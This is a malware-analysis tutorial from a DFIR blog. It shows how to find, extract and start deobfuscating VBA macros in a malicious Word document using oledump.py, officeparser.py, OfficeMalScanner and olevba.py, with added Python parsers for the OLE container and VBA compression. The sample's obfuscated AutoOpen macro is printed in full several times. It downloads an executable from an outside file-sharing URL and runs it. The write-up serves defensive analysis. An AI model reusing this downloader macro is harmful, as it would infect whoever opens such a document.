dfir it!

responding to incidents with candied bacon

Analyst’s Handbook - Analyzing Weaponized Documents

Weaponized documents (I really hate this name!) are just another method used by bad guys to deliver a malicious payload. Recently this technique was used by criminal groups delivering banking trojans (e.g. Dridex), but as you might expect it was also used by APT actors (e.g. Rocket Kitten in Operation Woolen Goldfish). Regardless of the threat type (APT, commodity, etc.), analysis of malicious documents should be an essential skill of every analyst.

Introduction

Nowadays Microsoft Office documents are collections of XML files stored in a ZIP file. Historically, storing multiple objects in one document was challenging for traditional file systems in terms of efficiency. To address this issue, a structure called the Microsoft Compound File Binary format, also known as an Object Linking and Embedding (OLE) compound file, was created. The structure defines a file as a hierarchical collection of two kinds of object: storages and streams. Basically, think of a storage and a stream as a directory and a file respectively.

Other objects that you might encounter in OLE files are macros. Macros automate tasks and add functionality to your documents (reports, forms, etc.). Macros are written in Visual Basic for Applications (VBA), which is where bad guys will often try to hide their malicious code. This is what we are after in this handbook: finding and extracting malicious code from OLE files!
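To make the storage/stream hierarchy concrete, here is a small Python reader added for this handbook (it is not part of the original post, nor code from oledump.py or any other tool mentioned here). It builds a constructed in-memory compound file whose directory mirrors the stream layout of a macro-bearing .doc, then parses the header, follows the FAT to the directory sectors and walks the sibling/child tree to list every stream with its full path, the kind of listing oledump.py produces. The names, sizes and sector layout are constructed for the example; only the structures needed for the listing are implemented (no mini stream, no DIFAT sectors outside the header, no stream data extraction).

```python
"""Minimal reader for the Compound File Binary (OLE2 / "CDF V2") container.

Added example for this handbook, not code from the original post or from
oledump.py. build_sample_doc() constructs a tiny CFB image in memory and
list_streams() walks header -> FAT -> directory to list the streams by path.
"""
import struct

CFB_MAGIC = b"\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1"   # what `file` reports as "CDF V2 Document"
ENDOFCHAIN, FATSECT, FREESECT = 0xFFFFFFFE, 0xFFFFFFFD, 0xFFFFFFFF
NOSTREAM = 0xFFFFFFFF                              # directory id meaning "no sibling / no child"
TYPE_STORAGE, TYPE_STREAM, TYPE_ROOT = 1, 2, 5
HEADER_SIZE = 512


def _dir_entry(name, obj_type, left=NOSTREAM, right=NOSTREAM, child=NOSTREAM, size=0):
    """Encode one 128-byte directory entry (UTF-16LE name, NUL terminated)."""
    raw = name.encode("utf-16-le") + b"\x00\x00"
    # name, name length, type, colour, left, right, child, CLSID, state, ctime, mtime, start sector, size
    return struct.pack("<64sHBBIII16sIQQIQ", raw.ljust(64, b"\x00"), len(raw), obj_type, 1,
                       left, right, child, b"\x00" * 16, 0, 0, 0, 0, size)


def build_sample_doc():
    """Constructed CFB image: 512-byte header, sector 0 = FAT, sectors 1-2 = directory."""
    entries = [
        _dir_entry("Root Entry", TYPE_ROOT, child=2),             # id 0
        _dir_entry("WordDocument", TYPE_STREAM, size=4096),        # id 1
        _dir_entry("Macros", TYPE_STORAGE, right=1, child=3),      # id 2
        _dir_entry("VBA", TYPE_STORAGE, child=4),                  # id 3
        _dir_entry("NewMacros", TYPE_STREAM, right=5, size=5258),  # id 4
        _dir_entry("ThisDocument", TYPE_STREAM, size=938),         # id 5
    ]
    directory = b"".join(entries).ljust(1024, b"\x00")             # 6 entries span two sectors
    # header: minor/major version, byte order, sector shift 9 (512 B), mini sector shift 6,
    # then: #dir sectors, #FAT sectors, first dir sector, txn sig, mini cutoff,
    # first mini FAT, #mini FAT, first DIFAT, #DIFAT
    header = CFB_MAGIC + b"\x00" * 16 + struct.pack(
        "<HHHHH6s9I", 0x3E, 3, 0xFFFE, 9, 6, b"\x00" * 6,
        0, 1, 1, 0, 4096, ENDOFCHAIN, 0, ENDOFCHAIN, 0)
    header += struct.pack("<109I", 0, *([FREESECT] * 108))        # DIFAT: the FAT is sector 0
    fat = struct.pack("<128I", FATSECT, 2, ENDOFCHAIN, *([FREESECT] * 125))  # dir chain 1 -> 2
    return header + fat + directory


def list_streams(data):
    """Return [(path, size), ...] for every stream reachable from the root storage."""
    if data[:8] != CFB_MAGIC:
        raise ValueError("not a Compound File Binary document")
    sector_shift, = struct.unpack_from("<H", data, 30)
    sector_size = 1 << sector_shift
    n_fat, first_dir = struct.unpack_from("<II", data, 44)
    difat = struct.unpack_from("<109I", data, 76)

    def sector(n):                                  # sector 0 begins right after the header
        start = HEADER_SIZE + n * sector_size
        return data[start:start + sector_size]

    fat = []                                        # FAT = the sectors listed in the DIFAT
    for s in difat[:n_fat]:
        fat.extend(struct.unpack("<%dI" % (sector_size // 4), sector(s)))

    dir_bytes, s, seen_sectors = b"", first_dir, set()
    while s != ENDOFCHAIN and s not in seen_sectors:  # guard against looping FAT chains
        seen_sectors.add(s)
        dir_bytes += sector(s)
        s = fat[s]
    entries = [dir_bytes[i:i + 128] for i in range(0, len(dir_bytes), 128)]

    def parse(idx):
        e = entries[idx]
        name_raw, name_len, obj_type = struct.unpack_from("<64sHB", e)
        left, right, child = struct.unpack_from("<III", e, 68)
        size, = struct.unpack_from("<Q", e, 120)
        return name_raw[:max(name_len - 2, 0)].decode("utf-16-le"), obj_type, left, right, child, size

    result, seen = [], set()

    def walk(idx, prefix):                          # in-order walk of the sibling tree
        if idx == NOSTREAM or idx >= len(entries) or idx in seen:
            return                                  # malformed ids/cycles must not crash the parser
        seen.add(idx)
        name, obj_type, left, right, child, size = parse(idx)
        walk(left, prefix)
        if obj_type == TYPE_STREAM:
            result.append((prefix + name, size))
        elif obj_type == TYPE_STORAGE:
            walk(child, prefix + name + "/")
        walk(right, prefix)

    walk(parse(0)[4], "")                           # start at the root entry's child
    return result


if __name__ == "__main__":
    for i, (path, size) in enumerate(list_streams(build_sample_doc()), 1):
        print("%3d: %8d %r" % (i, size, path))
```

Running the block prints a listing in the style of oledump.py. In real documents the sibling tree is a red-black tree ordered by name, and the ids and FAT chains of a hostile file cannot be trusted, which is why the walk keeps a visited set instead of recursing blindly.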

Prerequisites

Process

Lenny Zeltser created an awesome cheat sheet for analyzing malicious documents. In general it consists of the following steps:

  1. Find malicious code
  2. Extract code
  3. Analyze code
  4. Extract host and network indicators

Malware Analysis

Analysis will be carried out in REMnux, a free Linux toolkit for reverse-engineering and analyzing malware. The easiest and quickest option is to download the OVA file and set REMnux up as a virtual machine. Keep in mind that we will be analyzing a malicious script, so be sure to do it in a properly isolated environment. I will not describe how to set up a malware analysis environment in this post; however, there are plenty of resources available here, here, here and here.

Sample

If you want to follow along with the examples you can grab the file from www.hybrid-analysis.com.

Analysis

Personally, I like to start with the file command to get a better feeling for what I am dealing with.

remnux@remnux:~/Desktop/AnalystH$ file malware1.doc
malware1.doc: CDF V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: Admin, Template: Normal, Last Saved By: Raz0r, Revision Number: 198, Name of Creating Application: Microsoft Office Word,
Total Editing Time: 01:47:00, Create Time/Date: Mon Jan 12 00:32:00 2015, Last Saved Time/Date: Wed May  6 04:22:00 2015, Number of Pages: 1, Number of Words: 21, Number of Characters: 122, Security: 0

The output provides a lot of useful information, including:

  • File format: CDF V2 Document
  • OS: Windows
  • Application: Microsoft Word
  • Author name: Raz0r
  • Last Saved Time/Date: Wed May 6 04:22:00 2015

The Compound Document Format (CDF), as described in the introduction, contains multiple different objects.

Let’s take a closer look.

oledump.py

First we will examine the file with oledump.py, written and maintained by Didier Stevens.

remnux@remnux:~/Desktop/AnalystH$ oledump.py malware1.doc
  1:       114 '\x01CompObj'
  2:      4096 '\x05DocumentSummaryInformation'
  3:      4096 '\x05SummaryInformation'
  4:      9602 '1Table'
  5:    137803 'Data'
  6:       539 'Macros/PROJECT'
  7:        71 'Macros/PROJECTwm'
  8: M    5258 'Macros/VBA/NewMacros'
  9: m     938 'Macros/VBA/ThisDocument'
 10:      3483 'Macros/VBA/_VBA_PROJECT'
 11:       578 'Macros/VBA/dir'
 12:      4096 'WordDocument'

One of the cool things about oledump.py is its ability to mark streams that contain VBA code. In the output above we can see two streams called NewMacros and ThisDocument. The letters M and m indicate that VBA code is present. A lowercase m means the VBA contains only attribute statements (less interesting):

remnux@remnux:~/Desktop/AnalystH$ oledump.py -s9 -v malware1.doc
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

A given stream can be viewed by adding -s with the stream number. Since we know we are dealing with VBA code, the -v option instructs oledump.py to decompress the VBA code and make it easy to read.
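What -v actually does is undo the MS-OVBA "compressed container" that Office wraps around VBA source inside the module stream. The following Python decompressor is an added example for this handbook (not code from the original post or from oledump.py) that implements that algorithm: a 0x01 signature byte, then chunks of up to 4096 decompressed bytes, each with a 2-byte header (12-bit size, 3-bit signature 0b011, 1-bit "compressed" flag) followed by flag bytes that mark each of the next eight tokens as either a literal byte or a 2-byte LZ77-style copy token. The two test vectors are constructed by hand for this example; the helper that builds literal-only containers exists only to produce test input.

```python
"""MS-OVBA compressed-container decompressor (what oledump.py -v applies).

Added example for this handbook, not code from the original post or oledump.py.
"""
import struct


def decompress_vba(container: bytes) -> bytes:
    """Decompress an MS-OVBA container into the raw VBA source bytes."""
    if not container or container[0] != 0x01:
        raise ValueError("missing compressed-container signature byte 0x01")
    out = bytearray()
    pos = 1
    while pos < len(container):
        header, = struct.unpack_from("<H", container, pos)
        chunk_size = (header & 0x0FFF) + 3            # total chunk size, header included
        if (header >> 12) & 0x7 != 0b011:
            raise ValueError("bad chunk signature at offset %d" % pos)
        compressed = header >> 15
        chunk_end = min(len(container), pos + chunk_size)
        pos += 2
        chunk_start = len(out)                        # copy offsets are relative to the chunk
        if not compressed:                            # raw chunk: 4096 literal bytes follow
            out += container[pos:pos + 4096]
            pos += 4096
            continue
        while pos < chunk_end:
            flags = container[pos]                    # one flag bit per following token
            pos += 1
            for bit in range(8):
                if pos >= chunk_end:
                    break
                if not (flags >> bit) & 1:            # literal token: copy one byte
                    out.append(container[pos])
                    pos += 1
                    continue
                token, = struct.unpack_from("<H", container, pos)  # copy token
                pos += 2
                difference = len(out) - chunk_start   # bytes decoded so far in this chunk
                bits = 4                              # offset width grows with the window
                while (1 << bits) < difference:
                    bits += 1
                length = (token & (0xFFFF >> bits)) + 3
                offset = (token >> (16 - bits)) + 1
                src = len(out) - offset
                for i in range(length):               # byte-wise so overlapping copies work
                    out.append(out[src + i])
    return bytes(out)


def build_literal_container(data: bytes) -> bytes:
    """Constructed test helper: one compressed chunk made of literal tokens only.

    A real compressor would emit copy tokens; this only produces input for the
    decompressor. Limited to 3000 bytes so the 12-bit chunk size cannot overflow.
    """
    assert len(data) <= 3000
    body = bytearray()
    for i in range(0, len(data), 8):
        body.append(0x00)                             # flag byte: next 8 tokens are literals
        body += data[i:i + 8]
    header = 0x8000 | 0x3000 | (len(body) + 2 - 3)   # compressed, signature 011, size field
    return b"\x01" + struct.pack("<H", header) + bytes(body)


# Hand-built vector: literals "ABCD", then a copy token (offset 4, length 8)
# encoded as 0x3005 -> decompresses to "ABCDABCDABCD".
COPY_VECTOR = bytes([0x01, 0x06, 0xB0, 0x10, 0x41, 0x42, 0x43, 0x44, 0x05, 0x30])


if __name__ == "__main__":
    print(decompress_vba(COPY_VECTOR))
    src = b'Attribute VB_Name = "ThisDocument"\r\nSub AutoOpen()\r\nEnd Sub\r\n'
    print(decompress_vba(build_literal_container(src)).decode())
```

The copy-token split is the part most home-grown decoders get wrong: the number of bits used for the offset depends on how much of the current chunk has already been decoded, so a token at the start of a chunk is decoded differently from an identical token later on.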

Let’s dump it for later comparison with other tools.

remnux@remnux:~/Desktop/AnalystH$ oledump.py -s9 -v malware1.doc > attribute_code

Now let’s move to the stream marked with capital M, this is usually where analysts find juicy stuff:

remnux@remnux:~/Desktop/AnalystH$ oledump.py -s8 -v  malware1.doc

Attribute VB_Name = "NewMacros"
#If VBA7 Then
    Private Declare PtrSafe Function ProudtoBecomeaNepaliReverseEngineer Lib "urlmon" Alias "URLDownloadToFileA" _
    (ByVal JhjBjhGJHBfgjhffGggfGVgfVFGuHgHfGcV As Long, ByVal GyghGGBtgnfgdfGDFRGhojoJGBJFGhjFghJfHgh As String, ByVal tGtgfRDEVDFVUJUjhJGHJkujkuhJihuhBfgBF As String, ByVal lkaaJQQSxJfdLyE As Long, ByVal hujhBjhBfvcVcVdsswwsDswdFfgHUJFGHUJOIJJHhHjHGYYFtBVcfGGdGgDFGHuDfghuhDGhjjk As Long) As Long
#Else
    Private Declare Function ProudtoBecomeaNepaliReverseEngineer Lib "urlmon" Alias "URLDownloadToFileA" _
     (ByVal gBfGFGHFGhRfghrtjgHJfGHJFGHjTyhjGFGVRFTRftyFtyFghDFvtRTRGfGDTR As Long, ByVal ltnbTaRjJOa6JYn As String, ByVal liCRZKNefyicowI As String, ByVal lGONydFEvaD5IuX As Long, ByVal lmRYfcuLs5uEk2Z As Long) As Long
#End If

Sub AutoOpen()
    Dim loyagdbd As String
    Dim hhNjnhbhghyjhtgjhGjhFGHjkGjkfGBJHDTRGVDTrhfg As String
    hhNjnhbhghyjhtgjhGjhFGHjkGjkfGBJHDTRGVDTrhfg = CurDir()
    Dim NewPath As String
    NewPath = Replace(hhNjnhbhghyjhtgjhGjhFGHjkGjkfGBJHDTRGVDTrhfg, "\Desktop", "\AppData\Roaming")
    NewPath = "C:\Users\Public\Documents"
    Dim CheckNumbers As String
    CheckNumbers = ""
    Dim hFHBGjhGgFHdfGdfGHjHuIjhGhFGgHGtyFGgHUfgjhfgHJvbNfgUJHTyuiIUOIUJIYJHfg As String
    Dim NewString As String
    NewString = "Umbrella HBjhbhjkshdjkhJNggg GjHgggJkmNjh .exe GjNghJGjhJggggJh ggJnggfgHfgHdfG dfGdfGHHfGHH dDFCdFGBHVBhGjijok ghnfVBFGRTYJh fCvFgyhBgHHhFvB"
    Dim LotsofFuckingStringinallinOne As String
    LotsofFuckingStringinallinOne = "protection \ vulnerable worksheet wsc footage s rasberry student"
    Dim AnotherShitisHereSaysthis As String
    AnotherShitisHereSaysthis = "SbieCtrl encryption deauthentication hell ript. intrusion wireshark"
    Dim FinalWord As String
    FinalWord = CheckNumbers + Split(LotsofFuckingStringinallinOne)(4) + CheckNumbers + Split(AnotherShitisHereSaysthis)(4)
    hFHBGjhGgFHdfGdfGHjHuIjhGhFGgHGtyFGgHUfgjhfgHJvbNfgUJHTyuiIUOIUJIYJHfg = Split(AnotherShitisHereSaysthis)(0) & Split(NewString)(3)
    iJJHBujHgbgbtgftYtyuRwerqweRweoijhoIJOJnikjgHNFVBcv = "http://ge" & "." & "tt/api/1/files/2gmBurF2/0/blob?download" + CheckNumbers
    Dim IsProgramRegistered As String: IsProgramRegistered = FinalWord & Split(LotsofFuckingStringinallinOne)(6)
    ijHujhBujHBjHBgFfVGHGHjGhJFVGBHfvGFghJFV = CheckNumbers + CheckNumbers + CheckNumbers + "" + CheckNumbers + CheckNumbers
    lkFjuexVzhTjcrT = ijHujhBujHBjHBgFfVGHGHjGhJFVGBHfvGFghJFV & iJJHBujHgbgbtgftYtyuRwerqweRweoijhoIJOJnikjgHNFVBcv & ""
    iJghBfgBgBfgfVfBfVBFVBFhjhBjcVBcdVBCVBGBhjfGBFG = lkFjuexVzhTjcrT
    OIKJIKHJHBNJVbCVBCXVSDfsDFASdfwDEGERTYITIopoijhihujhb = NewPath & Split(LotsofFuckingStringinallinOne)(1) & hFHBGjhGgFHdfGdfGHjHuIjhGhFGgHGtyFGgHUfgjhfgHJvbNfgUJHTyuiIUOIUJIYJHfg + CheckNumbers
    lRoosrSIPgRZZm4 = OIKJIKHJHBNJVbCVBCXVSDfsDFASdfwDEGERTYITIopoijhihujhb
    lFA9cYQDsQOBIWU = ProudtoBecomeaNepaliReverseEngineer(0, CheckNumbers + CheckNumbers + CheckNumbers + CheckNumbers + CheckNumbers + iJghBfgBgBfgfVfBfVBFVBFhjhBjcVBcdVBCVBGBhjfGBFG & CheckNumbers & CheckNumbers & CheckNumbers, CheckNumbers & CheckNumbers & CheckNumbers & OIKJIKHJHBNJVbCVBCXVSDfsDFASdfwDEGERTYITIopoijhihujhb & CheckNumbers & CheckNumbers, 0, 0)

   If Dir(OIKJIKHJHBNJVbCVBCXVSDfsDFASdfwDEGERTYITIopoijhihujhb) <> "" Then
   Dim oJiHCFDFGEdCdfrVgyBHgyHJYGHjGbhYTfGHGfHJKHJJgUJIFGHjDfgHJdfh As Object
   Set oJiHCFDFGEdCdfrVgyBHgyHJYGHjGbhYTfGHGfHJKHJJgUJIFGHjDfgHJdfh = CreateObject(IsProgramRegistered & Split(AnotherShitisHereSaysthis)(3))
   Set oJiHCFDFGEdCdfrVgyBHgyHJYGHjGbhYTfGHGfHJKHJJgUJIFGHjDfgHJdfh = oJiHCFDFGEdCdfrVgyBHgyHJYGHjGbhYTfGHGfHJKHJJgUJIFGHjDfgHJdfh.exec(OIKJIKHJHBNJVbCVBCXVSDfsDFASdfwDEGERTYITIopoijhihujhb)
   End If
End Sub

It is safe to say we found our malicious code! We will dump the code for further analysis.

remnux@remnux:~/Desktop/AnalystH$ oledump.py -s8 -v  malware1.doc > malicious-code

Before we delve into deobfuscation and code analysis, let’s see how other tools cope with the same malicious file.

officeparser.py

officeparser.py by John William Davison prints similar information to oledump.py; however, it does not help analysts by marking the objects that contain VBA code.

remnux@remnux:~/Desktop/AnalystH$ officeparser.py -t malware1.doc
1: Data
2: 1Table
3: WordDocument
4: SummaryInformation
5: DocumentSummaryInformation
8: ThisDocument
9: NewMacros
10: _VBA_PROJECT
11: dir
12: PROJECTwm
13: PROJECT
14: CompObj

Even though officeparser.py does not highlight the objects of interest, macros can still be extracted with the --extract-macros option:

remnux@remnux:~/Desktop/AnalystH$ officeparser.py --extract-macros malware1.doc

Each macro object found will be saved to a separate file:

remnux@remnux:~/Desktop/AnalystH$ ls -laS
total 204
drwxrwxr-x 2 remnux remnux   4096 2015-05-17 08:06 .
drwxrwxr-x 3 remnux remnux   4096 2015-05-11 15:18 ..
-rw-rw-r-- 1 remnux remnux   3819 2015-05-17 07:47 malicious-code
-rw-rw-r-- 1 remnux remnux   3819 2015-05-17 08:03 NewMacros.bas
-rw-rw-r-- 1 remnux remnux    285 2015-05-17 08:06 attribute_code
-rw-rw-r-- 1 remnux remnux    285 2015-05-17 08:03 ThisDocument.cls

officeparser.py dumped exactly the same content as oledump.py:

remnux@remnux:~/Desktop/AnalystH/part1$ md5sum * | sort -n
c598c45b0d9d3090599ff1df77c5d612  attribute_code
c598c45b0d9d3090599ff1df77c5d612  ThisDocument.cls
8789d66197b3bbf265b8ed339d2f06e7  malicious-code
8789d66197b3bbf265b8ed339d2f06e7  NewMacros.bas

OfficeMalScanner

OfficeMalScanner, written by Frank Boldewin, is less interactive, but it automatically finds and extracts malicious code for further analysis. This is handy when we are interested in fast triage and code analysis only. Note that OfficeMalScanner is not included in the newest REMnux v6.

remnux@remnux:~/Desktop/AnalystH/part1$ OfficeMalScanner malware1.doc info

+------------------------------------------+
|           OfficeMalScanner v0.61         |
|  Frank Boldewin / www.reconstructer.org  |
+------------------------------------------+

[*] INFO mode selected
[*] Opening file malware1.doc
[*] Filesize is 176640 (0x2b200) Bytes
[*] Ms Office OLE2 Compound Format document detected

---------------------------------------
[Scanning for VB-code in MALWARE1.DOC]
---------------------------------------
NewMacros
ThisDocument
-----------------------------------------------------------------------------
                VB-MACRO CODE WAS FOUND INSIDE THIS FILE!
               The decompressed Macro code was stored here:

------> Z:\home\remnux\Desktop\AnalystH\part1\MALWARE1.DOC-Macros
----------------------------------------------------------------------------

Let’s check the files:

remnux@remnux:~/Desktop/AnalystH/part1/MALWARE1.DOC-Macros$ md5sum *
8789d66197b3bbf265b8ed339d2f06e7  NewMacros
76624a45e3d20ad3caeaa9d90d49dbbe  ThisDocument

OfficeMalScanner was able to extract the same streams. The file NewMacros, containing the malicious script, is exactly the same as the one extracted by the other tools; however, the file ThisDocument has a different MD5 hash. By checking the content (omitted for brevity), it seems to merge parts of the code from both streams containing VBA, which might confuse some analysts.

olevba.py

olevba.py, created by Decalage, performs all the steps of the process, including a basic analysis of the code:

remnux@remnux:~/Desktop/AnalystH/part1$ olevba.py malware1.doc
olevba 0.27 - http://decalage.info/python/oletools
Flags       Filename
----------- -----------------------------------------------------------------
OLE:MAS---- malware1.doc

(Flags: OpX=OpenXML, XML=Word2003XML, MHT=MHTML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)

===============================================================================
FILE: malware1.doc
Type: OLE
-------------------------------------------------------------------------------
VBA MACRO ThisDocument.cls
in file: malware1.doc - OLE stream: u'Macros/VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
-------------------------------------------------------------------------------
VBA MACRO NewMacros.bas
in file: malware1.doc - OLE stream: u'Macros/VBA/NewMacros'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
#If VBA7 Then
    Private Declare PtrSafe Function ProudtoBecomeaNepaliReverseEngineer Lib "urlmon" Alias "URLDownloadToFileA" _
    (ByVal JhjBjhGJHBfgjhffGggfGVgfVFGuHgHfGcV As Long, ByVal GyghGGBtgnfgdfGDFRGhojoJGBJFGhjFghJfHgh As String, ByVal tGtgfRDEVDFVUJUjhJGHJkujkuhJihuhBfgBF As String, ByVal lkaaJQQSxJfdLyE As Long, ByVal hujhBjhBfvcVcVdsswwsDswdFfgHUJFGHUJOIJJHhHjHGYYFtBVcfGGdGgDFGHuDfghuhDGhjjk As Long) As Long
#Else
    Private Declare Function ProudtoBecomeaNepaliReverseEngineer Lib "urlmon" Alias "URLDownloadToFileA" _
     (ByVal gBfGFGHFGhRfghrtjgHJfGHJFGHjTyhjGFGVRFTRftyFtyFghDFvtRTRGfGDTR As Long, ByVal ltnbTaRjJOa6JYn As String, ByVal liCRZKNefyicowI As String, ByVal lGONydFEvaD5IuX As Long, ByVal lmRYfcuLs5uEk2Z As Long) As Long
#End If

Sub AutoOpen()
    Dim loyagdbd As String
    Dim hhNjnhbhghyjhtgjhGjhFGHjkGjkfGBJHDTRGVDTrhfg As String
    hhNjnhbhghyjhtgjhGjhFGHjkGjkfGBJHDTRGVDTrhfg = CurDir()
    Dim NewPath As String
    NewPath = Replace(hhNjnhbhghyjhtgjhGjhFGHjkGjkfGBJHDTRGVDTrhfg, "\Desktop", "\AppData\Roaming")
    NewPath = "C:\Users\Public\Documents"
    Dim CheckNumbers As String
    CheckNumbers = ""
    Dim hFHBGjhGgFHdfGdfGHjHuIjhGhFGgHGtyFGgHUfgjhfgHJvbNfgUJHTyuiIUOIUJIYJHfg As String
    Dim NewString As String
    NewString = "Umbrella HBjhbhjkshdjkhJNggg GjHgggJkmNjh .exe GjNghJGjhJggggJh ggJnggfgHfgHdfG dfGdfGHHfGHH dDFCdFGBHVBhGjijok ghnfVBFGRTYJh fCvFgyhBgHHhFvB"
    Dim LotsofFuckingStringinallinOne As String
    LotsofFuckingStringinallinOne = "protection \ vulnerable worksheet wsc footage s rasberry student"
    Dim AnotherShitisHereSaysthis As String
    AnotherShitisHereSaysthis = "SbieCtrl encryption deauthentication hell ript. intrusion wireshark"
    Dim FinalWord As String
    FinalWord = CheckNumbers + Split(LotsofFuckingStringinallinOne)(4) + CheckNumbers + Split(AnotherShitisHereSaysthis)(4)
    hFHBGjhGgFHdfGdfGHjHuIjhGhFGgHGtyFGgHUfgjhfgHJvbNfgUJHTyuiIUOIUJIYJHfg = Split(AnotherShitisHereSaysthis)(0) & Split(NewString)(3)
    iJJHBujHgbgbtgftYtyuRwerqweRweoijhoIJOJnikjgHNFVBcv = "http://ge" & "." & "tt/api/1/files/2gmBurF2/0/blob?download" + CheckNumbers
    Dim IsProgramRegistered As String: IsProgramRegistered = FinalWord & Split(LotsofFuckingStringinallinOne)(6)
    ijHujhBujHBjHBgFfVGHGHjGhJFVGBHfvGFghJFV = CheckNumbers + CheckNumbers + CheckNumbers + "" + CheckNumbers + CheckNumbers
    lkFjuexVzhTjcrT = ijHujhBujHBjHBgFfVGHGHjGhJFVGBHfvGFghJFV & iJJHBujHgbgbtgftYtyuRwerqweRweoijhoIJOJnikjgHNFVBcv & ""
    iJghBfgBgBfgfVfBfVBFVBFhjhBjcVBcdVBCVBGBhjfGBFG = lkFjuexVzhTjcrT
    OIKJIKHJHBNJVbCVBCXVSDfsDFASdfwDEGERTYITIopoijhihujhb = NewPath & Split(LotsofFuckingStringinallinOne)(1) & hFHBGjhGgFHdfGdfGHjHuIjhGhFGgHGtyFGgHUfgjhfgHJvbNfgUJHTyuiIUOIUJIYJHfg + CheckNumbers
    lRoosrSIPgRZZm4 = OIKJIKHJHBNJVbCVBCXVSDfsDFASdfwDEGERTYITIopoijhihujhb
    lFA9cYQDsQOBIWU = ProudtoBecomeaNepaliReverseEngineer(0, CheckNumbers + CheckNumbers + CheckNumbers + CheckNumbers + CheckNumbers + iJghBfgBgBfgfVfBfVBFVBFhjhBjcVBcdVBCVBGBhjfGBFG & CheckNumbers & CheckNumbers & CheckNumbers, CheckNumbers & CheckNumbers & CheckNumbers & OIKJIKHJHBNJVbCVBCXVSDfsDFASdfwDEGERTYITIopoijhihujhb & CheckNumbers & CheckNumbers, 0, 0)

   If Dir(OIKJIKHJHBNJVbCVBCXVSDfsDFASdfwDEGERTYITIopoijhihujhb) <> "" Then
   Dim oJiHCFDFGEdCdfrVgyBHgyHJYGHjGbhYTfGHGfHJKHJJgUJIFGHjDfgHJdfh As Object
   Set oJiHCFDFGEdCdfrVgyBHgyHJYGHjGbhYTfGHGfHJKHJJgUJIFGHjDfgHJdfh = CreateObject(IsProgramRegistered & Split(AnotherShitisHereSaysthis)(3))
   Set oJiHCFDFGEdCdfrVgyBHgyHJYGHjGbhYTfGHGfHJKHJJgUJIFGHjDfgHJdfh = oJiHCFDFGEdCdfrVgyBHgyHJYGHjGbhYTfGHGfHJKHJJgUJIFGHjDfgHJdfh.exec(OIKJIKHJHBNJVbCVBCXVSDfsDFASdfwDEGERTYITIopoijhihujhb)
   End If
End Sub

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
ANALYSIS:
+------------+--------------------+---------------------------------------+
| Type       | Keyword            | Description                           |
+------------+--------------------+---------------------------------------+
| AutoExec   | AutoOpen           | Runs when the Word document is opened |
| Suspicious | CreateObject       | May create an OLE object              |
| Suspicious | Lib                | May run code from a DLL               |
| Suspicious | URLDownloadToFileA | May download files from the Internet  |
+------------+--------------------+---------------------------------------+

Unfortunately none of the tools is able to deobfuscate the code; that would be too easy! So far we have looked at different methods of finding and extracting malicious code from OLE documents. It is high time to deobfuscate this bad boy!

Code deobfuscation

There is never a “one size fits all” solution for deobfuscating code. A good thing to start with is to clean up the code by replacing the randomly generated variable names. For this, just open the code in any text editor and use the “find and replace” feature to rename the randomly named variables to something more readable.

I like to rename variables so they start with a capital letter that tells me the variable type, for instance:

  • S_var1 means this variable is of a String type.

This is how the code looks after the initial clean-up:

Attribute VB_Name = "NewMacros"
#If VBA7 Then
    Private Declare PtrSafe Function ProudtoBecomeaNepaliReverseEngineer Lib "urlmon" Alias "URLDownloadToFileA" _
    (ByVal L_var1 As Long, ByVal S_var1 As String, ByVal S_var2 As String, ByVal L_var2 As Long, ByVal L_var3 As Long) As Long
#Else
    Private Declare Function ProudtoBecomeaNepaliReverseEngineer Lib "urlmon" Alias "URLDownloadToFileA" _
     (ByVal L_var4 As Long, ByVal S_var3 As String, ByVal S_var4 As String, ByVal L_var5 As Long, ByVal L_var6 As Long) As Long
#End If

Sub AutoOpen()
    Dim S_var5 As String
    Dim S_var6 As String
    S_var6 = CurDir()
    Dim NewPath As String
    NewPath = Replace(S_var6, "\Desktop", "\AppData\Roaming")
    NewPath = "C:\Users\Public\Documents"
    Dim CheckNumbers As String
    CheckNumbers = ""
    Dim S_var7 As String
    Dim NewString As String
    NewString = "Umbrella HBjhbhjkshdjkhJNggg GjHgggJkmNjh .exe GjNghJGjhJggggJh ggJnggfgHfgHdfG dfGdfGHHfGHH dDFCdFGBHVBhGjijok ghnfVBFGRTYJh fCvFgyhBgHHhFvB"
    Dim LotsofFuckingStringinallinOne As String
    LotsofFuckingStringinallinOne = "protection \ vulnerable worksheet wsc footage s rasberry student"
    Dim AnotherShitisHereSaysthis As String
    AnotherShitisHereSaysthis = "SbieCtrl encryption deauthentication hell ript. intrusion wireshark"
    Dim FinalWord As String
    FinalWord = CheckNumbers + Split(LotsofFuckingStringinallinOne)(4) + CheckNumbers + Split(AnotherShitisHereSaysthis)(4)
    S_var7 = Split(AnotherShitisHereSaysthis)(0) & Split(NewString)(3)
    S_var8 = "http://ge" & "." & "tt/api/1/files/2gmBurF2/0/blob?download" + CheckNumbers
    Dim IsProgramRegistered As String: IsProgramRegistered = FinalWord & Split(LotsofFuckingStringinallinOne)(6)
    S_var9 = CheckNumbers + CheckNumbers + CheckNumbers + "" + CheckNumbers + CheckNumbers
    S_var10 = S_var9 & S_var8 & ""
    S_var11 = S_var10
    S_var12 = NewPath & Split(LotsofFuckingStringinallinOne)(1) & S_var7 + CheckNumbers
    S_var13 = S_var12
    S_var14 = ProudtoBecomeaNepaliReverseEngineer(0, CheckNumbers + CheckNumbers + CheckNumbers + CheckNumbers + CheckNumbers + S_var11 & CheckNumbers & CheckNumbers & CheckNumbers, CheckNumbers & CheckNumbers & CheckNumbers & S_var12 & CheckNumbers & CheckNumbers, 0, 0)

   If Dir(S_var12) <> "" Then
   Dim O_var1 As Object
   Set O_var1 = CreateObject(IsProgramRegistered & Split(AnotherShitisHereSaysthis)(3))
   Set O_var1 = O_var1.exec(S_var12)
   End If
End Sub

